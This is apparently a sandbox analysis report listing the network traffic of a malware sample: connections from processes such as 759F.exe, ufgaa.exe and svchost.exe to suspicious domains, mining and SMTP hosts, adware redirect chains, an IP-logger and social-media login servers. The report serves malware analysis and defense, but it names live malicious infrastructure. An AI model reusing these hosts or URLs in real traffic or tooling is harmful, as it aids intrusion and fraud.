                                                                                        • 54.227.178.166:443
                                                                                          https://venetrigni.com/stats
                                                                                          tls, http2
                                                                                          MicrosoftEdgeCP.exe
                                                                                          1.7kB
                                                                                          6.8kB
                                                                                          20
                                                                                          16

                                                                                          HTTP Request

                                                                                          GET https://venetrigni.com/stats

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 54.225.64.149:443
                                                                                          typiccor.com
                                                                                          tls
                                                                                          MicrosoftEdgeCP.exe
                                                                                          890 B
                                                                                          6.2kB
                                                                                          13
                                                                                          10
                                                                                        • 54.225.64.149:443
                                                                                          https://typiccor.com/kKQhPEMgbpfpPY1Tk7zFlGtbiyW7ZUCqVcQgbppQLG0/?clck=5ba17bae056a51dcf980a730fdaf383f&sid=14576783
                                                                                          tls, http
                                                                                          MicrosoftEdgeCP.exe
                                                                                          2.9kB
                                                                                          51.7kB
                                                                                          45
                                                                                          42

                                                                                          HTTP Request

                                                                                          GET https://typiccor.com/kKQhPEMgbpfpPY1Tk7zFlGtbiyW7ZUCqVcQgbppQLG0/?clck=5ba17bae056a51dcf980a730fdaf383f&sid=14576783

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 54.225.64.149:443
                                                                                          typiccor.com
                                                                                          tls
                                                                                          MicrosoftEdge.exe
                                                                                          880 B
                                                                                          6.2kB
                                                                                          13
                                                                                          10
                                                                                        • 54.225.64.149:443
                                                                                          https://typiccor.com/favicon.ico
                                                                                          tls, http
                                                                                          MicrosoftEdge.exe
                                                                                          1.3kB
                                                                                          6.9kB
                                                                                          15
                                                                                          11

                                                                                          HTTP Request

                                                                                          GET https://typiccor.com/favicon.ico

                                                                                          HTTP Response

                                                                                          404
                                                                                        • 54.197.173.238:443
                                                                                          tttttt.me
                                                                                          tls
                                                                                          759F.exe
                                                                                          572 B
                                                                                          120 B
                                                                                          5
                                                                                          3
                                                                                        • 54.197.173.238:443
                                                                                          tttttt.me
                                                                                          tls
                                                                                          759F.exe
                                                                                          572 B
                                                                                          120 B
                                                                                          5
                                                                                          3
                                                                                        • 204.79.197.200:443
                                                                                          ieonline.microsoft.com
                                                                                          tls, http2
                                                                                          MicrosoftEdge.exe
                                                                                          1.1kB
                                                                                          7.9kB
                                                                                          14
                                                                                          14
                                                                                        • 204.79.197.200:443
                                                                                          https://www.bing.com/cortanaassist/rules?cc=US&version=6
                                                                                          tls, http2
                                                                                          MicrosoftEdge.exe
                                                                                          3.1kB
                                                                                          50.3kB
                                                                                          48
                                                                                          48

                                                                                          HTTP Request

                                                                                          GET https://www.bing.com/cortanaassist/rules?cc=US&version=6

                                                                                          HTTP Response

                                                                                          404
                                                                                        • 204.79.197.200:443
                                                                                          www.bing.com
                                                                                          tls, http2
                                                                                          MicrosoftEdge.exe
                                                                                          1.3kB
                                                                                          7.9kB
                                                                                          14
                                                                                          14
                                                                                        • 95.216.206.250:484
                                                                                          svchost.exe
                                                                                          9.5kB
                                                                                          534.5kB
                                                                                          188
                                                                                          366
                                                                                        • 213.91.128.133:10060
                                                                                          fastpool.xyz
                                                                                          -a
                                                                                          3.7kB
                                                                                          9.0kB
                                                                                          49
                                                                                          35
                                                                                        • 176.111.174.124:420
                                                                                          svchost.exe
                                                                                          8.9kB
                                                                                          9.7kB
                                                                                          95
                                                                                          172
                                                                                        • 162.244.34.228:420
                                                                                          svchost.exe
                                                                                          8.4kB
                                                                                          9.4kB
                                                                                          87
                                                                                          168
                                                                                        • 176.111.174.125:420
                                                                                          svchost.exe
                                                                                          203.5kB
                                                                                          92.4kB
                                                                                          443
                                                                                          534
                                                                                        • 176.111.174.126:420
                                                                                          svchost.exe
                                                                                          195.9kB
                                                                                          51.3kB
                                                                                          422
                                                                                          471
                                                                                        • 176.9.102.196:420
                                                                                          svchost.exe
                                                                                          44.1kB
                                                                                          23.5kB
                                                                                          158
                                                                                          218
                                                                                        • 136.243.18.158:420
                                                                                          svchost.exe
                                                                                          125.3kB
                                                                                          30.9kB
                                                                                          305
                                                                                          351
                                                                                        • 142.251.36.4:80
                                                                                          http://www.google.com/
                                                                                          http
                                                                                          svchost.exe
                                                                                          643 B
                                                                                          3.0kB
                                                                                          6
                                                                                          5

                                                                                          HTTP Request

                                                                                          GET http://www.google.com/

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 142.251.36.4:80
                                                                                          http://www.google.com/
                                                                                          http
                                                                                          svchost.exe
                                                                                          643 B
                                                                                          3.0kB
                                                                                          6
                                                                                          5

                                                                                          HTTP Request

                                                                                          GET http://www.google.com/

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 142.251.36.4:80
                                                                                          http://www.google.com/
                                                                                          http
                                                                                          svchost.exe
                                                                                          643 B
                                                                                          3.0kB
                                                                                          6
                                                                                          5

                                                                                          HTTP Request

                                                                                          GET http://www.google.com/

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 142.251.36.4:80
                                                                                          http://www.google.com/
                                                                                          http
                                                                                          svchost.exe
                                                                                          643 B
                                                                                          3.0kB
                                                                                          6
                                                                                          5

                                                                                          HTTP Request

                                                                                          GET http://www.google.com/

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 142.251.36.4:80
                                                                                          http://www.google.com/
                                                                                          http
                                                                                          svchost.exe
                                                                                          643 B
                                                                                          3.0kB
                                                                                          6
                                                                                          5

                                                                                          HTTP Request

                                                                                          GET http://www.google.com/

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 142.251.36.4:80
                                                                                          http://www.google.com/
                                                                                          http
                                                                                          svchost.exe
                                                                                          643 B
                                                                                          3.0kB
                                                                                          6
                                                                                          5

                                                                                          HTTP Request

                                                                                          GET http://www.google.com/

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 31.13.83.52:443
                                                                                          i.instagram.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          4.2kB
                                                                                          9.3kB
                                                                                          15
                                                                                          18
                                                                                        • 54.197.173.238:443
                                                                                          tttttt.me
                                                                                          tls
                                                                                          759F.exe
                                                                                          572 B
                                                                                          120 B
                                                                                          5
                                                                                          3
                                                                                        • 54.197.173.238:443
                                                                                          tttttt.me
                                                                                          tls
                                                                                          759F.exe
                                                                                          572 B
                                                                                          120 B
                                                                                          5
                                                                                          3
                                                                                        • 31.13.83.174:443
                                                                                          www.instagram.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          939 B
                                                                                          6.2kB
                                                                                          8
                                                                                          10
                                                                                        • 31.13.83.174:443
                                                                                          www.instagram.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          973 B
                                                                                          6.3kB
                                                                                          9
                                                                                          11
                                                                                        • 54.197.173.238:443
                                                                                          tttttt.me
                                                                                          tls
                                                                                          759F.exe
                                                                                          358 B
                                                                                          80 B
                                                                                          4
                                                                                          2
                                                                                        • 82.118.23.111:80
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          http
                                                                                          1.4kB
                                                                                          1.2kB
                                                                                          9
                                                                                          9

                                                                                          HTTP Request

                                                                                          POST http://999080321newfolder1002-01462599908032135.site/

                                                                                          HTTP Response

                                                                                          404

                                                                                          HTTP Request

                                                                                          POST http://999080321newfolder1002-01462599908032135.site/

                                                                                          HTTP Response

                                                                                          404
                                                                                        • 31.13.83.174:443
                                                                                          www.instagram.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          981 B
                                                                                          6.2kB
                                                                                          9
                                                                                          10
                                                                                        • 31.13.83.174:443
                                                                                          www.instagram.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          979 B
                                                                                          6.2kB
                                                                                          9
                                                                                          10
                                                                                        • 54.197.173.238:443
                                                                                          tttttt.me
                                                                                          tls
                                                                                          759F.exe
                                                                                          358 B
                                                                                          80 B
                                                                                          4
                                                                                          2
                                                                                        • 31.13.83.174:443
                                                                                          www.instagram.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          980 B
                                                                                          6.2kB
                                                                                          9
                                                                                          10
                                                                                        • 31.13.83.174:443
                                                                                          www.instagram.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          987 B
                                                                                          6.2kB
                                                                                          9
                                                                                          10
                                                                                        • 45.138.172.81:8765
                                                                                          svchost.exe
                                                                                          190 B
                                                                                          92 B
                                                                                          4
                                                                                          2
                                                                                        • 159.153.191.240:443
                                                                                          accounts.ea.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          1.9kB
                                                                                          4.2kB
                                                                                          13
                                                                                          13
                                                                                        • 159.153.191.239:443
                                                                                          signin.ea.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          3.0kB
                                                                                          14.2kB
                                                                                          20
                                                                                          24
                                                                                        • 159.153.191.239:443
                                                                                          signin.ea.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          3.5kB
                                                                                          6.5kB
                                                                                          14
                                                                                          17
                                                                                        • 31.13.83.174:443
                                                                                          www.instagram.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          931 B
                                                                                          6.2kB
                                                                                          8
                                                                                          10
                                                                                        • 159.153.191.239:443
                                                                                          signin.ea.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          3.3kB
                                                                                          9.2kB
                                                                                          16
                                                                                          19
                                                                                        • 54.197.173.238:443
                                                                                          tttttt.me
                                                                                          tls
                                                                                          759F.exe
                                                                                          358 B
                                                                                          80 B
                                                                                          4
                                                                                          2
                                                                                        • 139.45.197.236:80
                                                                                          http://vexacion.com/?z=1851483&syncedCookie=true
                                                                                          http
                                                                                          MicrosoftEdgeCP.exe
                                                                                          2.3kB
                                                                                          5.6kB
                                                                                          17
                                                                                          9

                                                                                          HTTP Request

                                                                                          GET http://vexacion.com/afu.php?zoneid=1851483

                                                                                          HTTP Response

                                                                                          200

                                                                                          HTTP Request

                                                                                          POST http://vexacion.com/?z=1851483&syncedCookie=true

                                                                                          HTTP Response

                                                                                          302
                                                                                        • 139.45.197.236:80
                                                                                          vexacion.com
                                                                                          MicrosoftEdgeCP.exe
                                                                                          190 B
                                                                                          124 B
                                                                                          4
                                                                                          3
                                                                                        • 139.45.197.236:80
                                                                                          vexacion.com
                                                                                          MicrosoftEdge.exe
                                                                                          190 B
                                                                                          124 B
                                                                                          4
                                                                                          3
                                                                                        • 139.45.197.236:80
                                                                                          http://vexacion.com/favicon.ico
                                                                                          http
                                                                                          MicrosoftEdge.exe
                                                                                          1.2kB
                                                                                          706 B
                                                                                          14
                                                                                          5

                                                                                          HTTP Request

                                                                                          GET http://vexacion.com/favicon.ico

                                                                                          HTTP Response

                                                                                          204

                                                                                          HTTP Request

                                                                                          GET http://vexacion.com/favicon.ico

                                                                                          HTTP Response

                                                                                          204
                                                                                        • 139.45.195.8:443
                                                                                          https://my.rtmark.net/img.gif?f=merge&userId=3819b934f4054333861a9d6dc9a564e4
                                                                                          tls, http2
                                                                                          MicrosoftEdgeCP.exe
                                                                                          1.6kB
                                                                                          6.5kB
                                                                                          19
                                                                                          15

                                                                                          HTTP Request

                                                                                          GET https://my.rtmark.net/img.gif?f=merge&userId=3819b934f4054333861a9d6dc9a564e4

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 139.45.195.8:443
                                                                                          my.rtmark.net
                                                                                          tls, https
                                                                                          MicrosoftEdgeCP.exe
                                                                                          1.2kB
                                                                                          6.0kB
                                                                                          17
                                                                                          14
                                                                                        • 82.118.23.111:80
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          http
                                                                                          MicrosoftEdgeCP.exe
                                                                                          1.9kB
                                                                                          894 B
                                                                                          7
                                                                                          6

                                                                                          HTTP Request

                                                                                          POST http://999080321newfolder1002-01462599908032135.site/

                                                                                          HTTP Response

                                                                                          404
                                                                                        • 104.21.59.88:443
                                                                                          ssl.xdisctracking.pw
                                                                                          tls, http2
                                                                                          MicrosoftEdgeCP.exe
                                                                                          1.0kB
                                                                                          3.6kB
                                                                                          13
                                                                                          11
                                                                                        • 104.21.59.88:443
                                                                                          https://ssl.xdisctracking.pw/tracking202/redirect/rtr.php?t202id=44563&c1=437503065499636034&c2=PA_POP_1851483&t202kw=PA_POP_1851483
                                                                                          tls, http2
                                                                                          MicrosoftEdgeCP.exe
                                                                                          1.5kB
                                                                                          4.4kB
                                                                                          15
                                                                                          13

                                                                                          HTTP Request

                                                                                          GET https://ssl.xdisctracking.pw/tracking202/redirect/rtr.php?t202id=44563&c1=437503065499636034&c2=PA_POP_1851483&t202kw=PA_POP_1851483

                                                                                          HTTP Response

                                                                                          302
                                                                                        • 172.67.185.200:443
                                                                                          www.freevpn.win
                                                                                          tls, http2
                                                                                          MicrosoftEdgeCP.exe
                                                                                          1.0kB
                                                                                          3.6kB
                                                                                          13
                                                                                          11
                                                                                        • 172.67.185.200:443
                                                                                          https://www.freevpn.win/lps/assist/lp-download-ie.png
                                                                                          tls, http2
                                                                                          MicrosoftEdgeCP.exe
                                                                                          7.7kB
                                                                                          141.2kB
                                                                                          133
                                                                                          123

                                                                                          HTTP Request

                                                                                          GET https://www.freevpn.win/lps/gbox-lp/index.html?cid=186205267&kw=PA_POP_1851483

                                                                                          HTTP Response

                                                                                          200

                                                                                          HTTP Request

                                                                                          GET https://www.freevpn.win/lps/gbox-lp/lpbox.css?ts=9348934

                                                                                          HTTP Request

                                                                                          GET https://www.freevpn.win/lps/assist/assist.css?ts=388438544

                                                                                          HTTP Request

                                                                                          GET https://www.freevpn.win/lps/gbox-lp/logo-72x72.png

                                                                                          HTTP Response

                                                                                          200

                                                                                          HTTP Response

                                                                                          200

                                                                                          HTTP Response

                                                                                          200

                                                                                          HTTP Request

                                                                                          GET https://www.freevpn.win/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js

                                                                                          HTTP Response

                                                                                          200

                                                                                          HTTP Request

                                                                                          GET https://www.freevpn.win/lps/dlcommon.js?ts=2345535677

                                                                                          HTTP Response

                                                                                          200

                                                                                          HTTP Request

                                                                                          GET https://www.freevpn.win/lps/gbox-lp/fonts/helveticaneueltstd-roman_0-webfont.woff

                                                                                          HTTP Response

                                                                                          200

                                                                                          HTTP Request

                                                                                          GET https://www.freevpn.win/lps/gbox-lp/top.png

                                                                                          HTTP Response

                                                                                          200

                                                                                          HTTP Request

                                                                                          GET https://www.freevpn.win/lps/gbox-lp/mid.png

                                                                                          HTTP Request

                                                                                          GET https://www.freevpn.win/lps/gbox-lp/bottom.png

                                                                                          HTTP Response

                                                                                          200

                                                                                          HTTP Response

                                                                                          200

                                                                                          HTTP Request

                                                                                          GET https://www.freevpn.win/lps/assist/lp-download-ie.png

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 104.16.18.94:443
                                                                                          https://cdnjs.cloudflare.com/ajax/libs/jquery/1.11.1/jquery.min.js
                                                                                          tls, http2
                                                                                          MicrosoftEdgeCP.exe
                                                                                          4.2kB
                                                                                          90.1kB
                                                                                          75
                                                                                          73

                                                                                          HTTP Request

                                                                                          GET https://cdnjs.cloudflare.com/ajax/libs/jqueryui/1.10.2/jquery-ui.min.js

                                                                                          HTTP Request

                                                                                          GET https://cdnjs.cloudflare.com/ajax/libs/jquery/1.11.1/jquery.min.js

                                                                                          HTTP Response

                                                                                          200

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 104.16.18.94:443
                                                                                          cdnjs.cloudflare.com
                                                                                          tls, http2
                                                                                          MicrosoftEdgeCP.exe
                                                                                          1.0kB
                                                                                          3.6kB
                                                                                          13
                                                                                          11
                                                                                        • 34.230.220.28:443
                                                                                          https://track.xdisctracking.pw/impression/0c4a809a-fe91-45d9-9cbb-56283b83c79a?SubID=null&ClickID=186205267&KW202=PA_POP_1851483
                                                                                          tls, http
                                                                                          MicrosoftEdgeCP.exe
                                                                                          1.5kB
                                                                                          6.5kB
                                                                                          15
                                                                                          10

                                                                                          HTTP Request

                                                                                          GET https://track.xdisctracking.pw/impression/0c4a809a-fe91-45d9-9cbb-56283b83c79a?SubID=null&ClickID=186205267&KW202=PA_POP_1851483

                                                                                          HTTP Response

                                                                                          204
                                                                                        • 34.230.220.28:443
                                                                                          track.xdisctracking.pw
                                                                                          tls
                                                                                          MicrosoftEdgeCP.exe
                                                                                          900 B
                                                                                          5.7kB
                                                                                          13
                                                                                          10
                                                                                        • 172.67.185.200:443
                                                                                          https://www.freevpn.win/favicon.ico
                                                                                          tls, http2
                                                                                          MicrosoftEdge.exe
                                                                                          1.6kB
                                                                                          8.7kB
                                                                                          20
                                                                                          17

                                                                                          HTTP Request

                                                                                          GET https://www.freevpn.win/lps/favicon.ico

                                                                                          HTTP Response

                                                                                          404

                                                                                          HTTP Request

                                                                                          GET https://www.freevpn.win/favicon.ico

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 172.67.185.200:443
                                                                                          www.freevpn.win
                                                                                          tls, http2
                                                                                          MicrosoftEdge.exe
                                                                                          918 B
                                                                                          3.4kB
                                                                                          11
                                                                                          9
                                                                                        • 31.13.83.174:443
                                                                                          www.instagram.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          969 B
                                                                                          6.3kB
                                                                                          9
                                                                                          11
                                                                                        • 31.13.83.174:443
                                                                                          www.instagram.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          932 B
                                                                                          6.2kB
                                                                                          8
                                                                                          10
                                                                                        • 31.13.83.174:443
                                                                                          www.instagram.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          978 B
                                                                                          6.2kB
                                                                                          9
                                                                                          10
                                                                                        • 54.197.173.238:443
                                                                                          tttttt.me
                                                                                          tls
                                                                                          759F.exe
                                                                                          358 B
                                                                                          80 B
                                                                                          4
                                                                                          2
                                                                                        • 31.13.83.174:443
                                                                                          www.instagram.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          932 B
                                                                                          6.2kB
                                                                                          8
                                                                                          10
                                                                                        • 31.13.83.174:443
                                                                                          www.instagram.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          971 B
                                                                                          6.2kB
                                                                                          9
                                                                                          10
                                                                                        • 54.197.173.238:443
                                                                                          tttttt.me
                                                                                          tls
                                                                                          759F.exe
                                                                                          358 B
                                                                                          80 B
                                                                                          4
                                                                                          2
                                                                                        • 31.13.83.174:443
                                                                                          www.instagram.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          1.0kB
                                                                                          6.3kB
                                                                                          10
                                                                                          11
                                                                                        • 31.13.83.174:443
                                                                                          www.instagram.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          926 B
                                                                                          6.2kB
                                                                                          8
                                                                                          10
                                                                                        • 31.13.83.174:443
                                                                                          www.instagram.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          978 B
                                                                                          6.2kB
                                                                                          9
                                                                                          10
                                                                                        • 211.231.108.176:25
                                                                                          smtp
                                                                                          svchost.exe
                                                                                          5.8kB
                                                                                          3.1kB
                                                                                          64
                                                                                          40
                                                                                        • 31.13.83.174:443
                                                                                          www.instagram.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          978 B
                                                                                          6.2kB
                                                                                          9
                                                                                          10
                                                                                        • 5.61.43.76:80
                                                                                          http://nusurtal4f.net/
                                                                                          http
                                                                                          812 B
                                                                                          413 B
                                                                                          7
                                                                                          5

                                                                                          HTTP Request

                                                                                          POST http://nusurtal4f.net/

                                                                                          HTTP Response

                                                                                          404
                                                                                        • 54.197.173.238:443
                                                                                          tttttt.me
                                                                                          tls
                                                                                          759F.exe
                                                                                          358 B
                                                                                          80 B
                                                                                          4
                                                                                          2
                                                                                        • 31.13.83.174:443
                                                                                          www.instagram.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          2.8kB
                                                                                          7.5kB
                                                                                          14
                                                                                          15
                                                                                        • 31.13.83.36:443
                                                                                          https://www.facebook.com/
                                                                                          tls, http
                                                                                          ufgaa.exe
                                                                                          6.1kB
                                                                                          269.3kB
                                                                                          111
                                                                                          199

                                                                                          HTTP Request

                                                                                          GET https://www.facebook.com/

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 88.218.92.148:80
                                                                                          http://uyg5wye.2ihsfa.com/api/?sid=72869&key=d871ff8abd9a60f9f0fd16913295de1e
                                                                                          http
                                                                                          ufgaa.exe
                                                                                          1.2kB
                                                                                          800 B
                                                                                          8
                                                                                          7

                                                                                          HTTP Request

                                                                                          GET http://uyg5wye.2ihsfa.com/api/fbtime

                                                                                          HTTP Response

                                                                                          200

                                                                                          HTTP Request

                                                                                          POST http://uyg5wye.2ihsfa.com/api/?sid=72869&key=d871ff8abd9a60f9f0fd16913295de1e

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 88.99.66.31:443
                                                                                          https://iplogger.org/18hh57
                                                                                          tls, http
                                                                                          ufgaa.exe
                                                                                          1.4kB
                                                                                          6.4kB
                                                                                          11
                                                                                          12

                                                                                          HTTP Request

                                                                                          GET https://iplogger.org/18hh57

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 95.216.206.250:484
                                                                                          svchost.exe
                                                                                          5.5kB
                                                                                          964 B
                                                                                          18
                                                                                          13
                                                                                        • 54.197.173.238:443
                                                                                          tttttt.me
                                                                                          tls
                                                                                          759F.exe
                                                                                          786 B
                                                                                          160 B
                                                                                          6
                                                                                          4
                                                                                        • 211.231.108.175:25
                                                                                          smtp
                                                                                          svchost.exe
                                                                                          190 B
                                                                                          241 B
                                                                                          4
                                                                                          4
                                                                                        • 54.197.173.238:443
                                                                                          tttttt.me
                                                                                          tls
                                                                                          759F.exe
                                                                                          624 B
                                                                                          120 B
                                                                                          6
                                                                                          3
                                                                                        • 31.13.83.174:443
                                                                                          www.instagram.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          935 B
                                                                                          6.2kB
                                                                                          8
                                                                                          10
                                                                                        • 54.197.173.238:443
                                                                                          tttttt.me
                                                                                          tls
                                                                                          759F.exe
                                                                                          572 B
                                                                                          120 B
                                                                                          5
                                                                                          3
                                                                                        • 31.13.83.174:443
                                                                                          www.instagram.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          1.6kB
                                                                                          5.2kB
                                                                                          12
                                                                                          13
                                                                                        • 139.45.197.236:80
                                                                                          http://vexacion.com/?z=1851513&syncedCookie=false
                                                                                          http
                                                                                          MicrosoftEdgeCP.exe
                                                                                          2.4kB
                                                                                          5.4kB
                                                                                          17
                                                                                          8

                                                                                          HTTP Request

                                                                                          GET http://vexacion.com/afu.php?zoneid=1851513

                                                                                          HTTP Response

                                                                                          200

                                                                                          HTTP Request

                                                                                          POST http://vexacion.com/?z=1851513&syncedCookie=false

                                                                                          HTTP Response

                                                                                          302
                                                                                        • 139.45.197.236:80
                                                                                          vexacion.com
                                                                                          MicrosoftEdgeCP.exe
                                                                                          190 B
                                                                                          124 B
                                                                                          4
                                                                                          3
                                                                                        • 82.118.23.111:80
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          http
                                                                                          MicrosoftEdgeCP.exe
                                                                                          1.9kB
                                                                                          894 B
                                                                                          7
                                                                                          6

                                                                                          HTTP Request

                                                                                          POST http://999080321newfolder1002-01462599908032135.site/

                                                                                          HTTP Response

                                                                                          404
                                                                                        • 139.45.195.8:443
                                                                                          my.rtmark.net
                                                                                          tls, http2
                                                                                          MicrosoftEdgeCP.exe
                                                                                          1.2kB
                                                                                          5.9kB
                                                                                          16
                                                                                          13
                                                                                        • 139.45.195.8:443
                                                                                          my.rtmark.net
                                                                                          tls, https
                                                                                          MicrosoftEdgeCP.exe
                                                                                          1.6kB
                                                                                          6.6kB
                                                                                          19
                                                                                          15
                                                                                        • 104.26.10.210:443
                                                                                          visit.fractalclick.com
                                                                                          tls, http2
                                                                                          MicrosoftEdgeCP.exe
                                                                                          1.0kB
                                                                                          3.7kB
                                                                                          13
                                                                                          11
                                                                                        • 104.26.10.210:443
                                                                                          https://visit.fractalclick.com/JisNOc/?utm_source=3552&utm_campaign=7700576&clck=437504070291296917&sid=1851513
                                                                                          tls, http2
                                                                                          MicrosoftEdgeCP.exe
                                                                                          1.5kB
                                                                                          4.5kB
                                                                                          16
                                                                                          14

                                                                                          HTTP Request

                                                                                          GET https://visit.fractalclick.com/JisNOc/?utm_source=3552&utm_campaign=7700576&clck=437504070291296917&sid=1851513

                                                                                          HTTP Response

                                                                                          302
                                                                                        • 3.208.146.20:443
                                                                                          https://runswiftintenselythefile.vip/Qi91KZ6MbUOcxjRR4w9B-Z0yyY0yEAME5gKh22J4vW4?clck=437504070291296917&sid=1851513
                                                                                          tls, http
                                                                                          MicrosoftEdgeCP.exe
                                                                                          1.5kB
                                                                                          7.5kB
                                                                                          15
                                                                                          13

                                                                                          HTTP Request

                                                                                          GET https://runswiftintenselythefile.vip/Qi91KZ6MbUOcxjRR4w9B-Z0yyY0yEAME5gKh22J4vW4?clck=437504070291296917&sid=1851513

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 3.208.146.20:443
                                                                                          runswiftintenselythefile.vip
                                                                                          tls
                                                                                          MicrosoftEdgeCP.exe
                                                                                          906 B
                                                                                          6.3kB
                                                                                          13
                                                                                          11
                                                                                        • 104.26.11.220:443
                                                                                          https://webjscontent.com/dl.min.js
                                                                                          tls, http2
                                                                                          MicrosoftEdgeCP.exe
                                                                                          1.8kB
                                                                                          11.5kB
                                                                                          24
                                                                                          22

                                                                                          HTTP Request

                                                                                          GET https://webjscontent.com/dl.min.js

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 104.26.11.220:443
                                                                                          webjscontent.com
                                                                                          tls, http2
                                                                                          MicrosoftEdgeCP.exe
                                                                                          1.0kB
                                                                                          3.6kB
                                                                                          13
                                                                                          11
                                                                                        • 3.208.146.20:443
                                                                                          runswiftintenselythefile.vip
                                                                                          tls
                                                                                          MicrosoftEdge.exe
                                                                                          896 B
                                                                                          6.3kB
                                                                                          13
                                                                                          11
                                                                                        • 3.208.146.20:443
                                                                                          https://runswiftintenselythefile.vip/favicon.ico
                                                                                          tls, http
                                                                                          MicrosoftEdge.exe
                                                                                          1.3kB
                                                                                          7.1kB
                                                                                          15
                                                                                          13

                                                                                          HTTP Request

                                                                                          GET https://runswiftintenselythefile.vip/favicon.ico

                                                                                          HTTP Response

                                                                                          404
                                                                                        • 54.197.173.238:443
                                                                                          tttttt.me
                                                                                          tls
                                                                                          759F.exe
                                                                                          572 B
                                                                                          80 B
                                                                                          5
                                                                                          2
                                                                                        • 31.13.83.174:443
                                                                                          www.instagram.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          1.7kB
                                                                                          6.5kB
                                                                                          11
                                                                                          11
                                                                                        • 54.197.173.238:443
                                                                                          tttttt.me
                                                                                          tls
                                                                                          759F.exe
                                                                                          572 B
                                                                                          120 B
                                                                                          5
                                                                                          3
                                                                                        • 31.13.83.174:443
                                                                                          www.instagram.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          930 B
                                                                                          6.2kB
                                                                                          8
                                                                                          10
                                                                                        • 54.197.173.238:443
                                                                                          tttttt.me
                                                                                          tls
                                                                                          759F.exe
                                                                                          358 B
                                                                                          80 B
                                                                                          4
                                                                                          2
                                                                                        • 31.13.83.174:443
                                                                                          www.instagram.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          975 B
                                                                                          6.2kB
                                                                                          9
                                                                                          10
                                                                                        • 54.197.173.238:443
                                                                                          tttttt.me
                                                                                          tls
                                                                                          759F.exe
                                                                                          358 B
                                                                                          80 B
                                                                                          4
                                                                                          2
                                                                                        • 211.231.108.176:25
                                                                                          smtp
                                                                                          svchost.exe
                                                                                          190 B
                                                                                          241 B
                                                                                          4
                                                                                          4
                                                                                        • 31.13.71.174:443
                                                                                          www.instagram.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          1.7kB
                                                                                          5.2kB
                                                                                          14
                                                                                          14
                                                                                        • 54.197.173.238:443
                                                                                          tttttt.me
                                                                                          tls
                                                                                          759F.exe
                                                                                          358 B
                                                                                          80 B
                                                                                          4
                                                                                          2
                                                                                        • 104.215.148.63:80
                                                                                          microsoft.com
                                                                                          svchost.exe
                                                                                          190 B
                                                                                          92 B
                                                                                          4
                                                                                          2
                                                                                        • 40.93.212.0:25
                                                                                          microsoft-com.mail.protection.outlook.com
                                                                                          smtp
                                                                                          svchost.exe
                                                                                          236 B
                                                                                          290 B
                                                                                          5
                                                                                          4
                                                                                        • 31.13.83.174:443
                                                                                          www.instagram.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          928 B
                                                                                          6.2kB
                                                                                          8
                                                                                          10
                                                                                        • 54.197.173.238:443
                                                                                          tttttt.me
                                                                                          tls
                                                                                          759F.exe
                                                                                          358 B
                                                                                          80 B
                                                                                          4
                                                                                          2
                                                                                        • 95.216.206.250:484
                                                                                          svchost.exe
                                                                                          2.2kB
                                                                                          791 B
                                                                                          14
                                                                                          11
                                                                                        • 31.13.83.174:443
                                                                                          www.instagram.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          1.4kB
                                                                                          19.6kB
                                                                                          13
                                                                                          19
                                                                                        • 172.217.17.51:443
                                                                                          accounts.snapchat.com
                                                                                          tls
                                                                                          svchost.exe
                                                                                          3.4kB
                                                                                          10.0kB
                                                                                          16
                                                                                          19
                                                                                        • 54.197.173.238:443
                                                                                          tttttt.me
                                                                                          tls
                                                                                          759F.exe
                                                                                          786 B
                                                                                          160 B
                                                                                          6
                                                                                          4
                                                                                        • 35.201.70.46:80
